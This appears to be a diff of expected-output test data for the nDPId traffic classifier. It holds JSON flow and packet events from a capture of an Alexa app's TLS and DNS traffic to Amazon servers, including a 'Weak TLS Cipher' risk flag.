-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1490976107513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107513,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofkpAAEAGkLGsECrYNu8d\/Z+YAbtWLhYBhUEIvVAQAVfnJwAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1675,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107455,"flow_last_seen":1490976107514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107455,"flow_last_seen":1490976107625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1490976108360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976108360,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8yY9AAEAGRVisECrYNu8d\/Z+XAbtod6HOAAAAAKAC\/\/8G+AAAAgQFtAQCCAoA9mikAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1490976108548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976108548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt7hAAOcGsDo27x39rBAq2AG7n5d09wMmaHehz3ASH\/4UgAAAAgQFtAEDAwY="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1490976107365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107365,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZVhAAEAGqY+sECrYNu8d\/Z+VAbuWKg0YAAAAAKAC\/\/9uYQAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1662,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1490976107365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107365,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87ItAAEAGIlysECrYNu8d\/Z+WAbsjoITLAAAAAKAC\/\/9pNwAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1663,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107366,"flow_last_seen":1490976107366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107366,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1663,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1490976107366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107366,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8yY5AAEAGRVmsECrYNu8d\/Z+XAbtod6HOAAAAAKAC\/\/8HXAAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107455,"flow_last_seen":1490976107455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107455,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1490976107455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107455,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fklAAEAGkJ6sECrYNu8d\/Z+YAbtWLhYAAAAAAKAC\/\/+laQAAAgQFtAQCCAoA9mhJAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1490976107475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwq71AAOcGvDU27x39rBAq2AG7n5aOPa1rI6CEzHASH\/6yzwAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1490976107477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107477,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7IxAAEAGIm+sECrYNu8d\/Z+WAbsjoITMjj2tbFAQAVf9QAAA"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107479,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107479,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1490976107484,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107484,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkaBAAOcG1lI27x39rBAq2AG7n5UJgL2ZlioNGXASH\/4siQAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1490976107485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107485,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZVlAAEAGqaKsECrYNu8d\/Z+VAbuWKg0ZCYC9mlAQAVd2+gAA"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1490976107511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107511,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwxddAAOcGohs27x39rBAq2AG7n5iFQQi8Vi4WAXASH\/6ctgAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1490976107513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107513,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofkpAAEAGkLGsECrYNu8d\/Z+YAbtWLhYBhUEIvVAQAVfnJwAA"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1675,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107455,"flow_last_seen":1490976107514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107455,"flow_last_seen":1490976107625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1490976108360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976108360,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8yY9AAEAGRVisECrYNu8d\/Z+XAbtod6HOAAAAAKAC\/\/8G+AAAAgQFtAQCCAoA9mikAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1490976108548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976108548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt7hAAOcGsDo27x39rBAq2AG7n5d09wMmaHehz3ASH\/4UgAAAAgQFtAEDAwY="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1490976114879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1490976114879,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWl1AAEARM1WsECrYrBAqAVG6ADUALQ0pp4sBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1490976114880,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1490976114880,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR3zxAAEARrmWsECoBrBAq2AA1UboAPYqqp4uBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAAAoABDRe6IY="} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976114880,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114885,"flow_last_seen":1490976114885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114885,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1490976114885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114885,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8u1JAAEAGi5ysECrYNF7ohrKgAbstn9BiAAAAAKAC\/\/81rgAAAgQFtAQCCAoA9mswAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1859,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114894,"flow_last_seen":1490976114894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 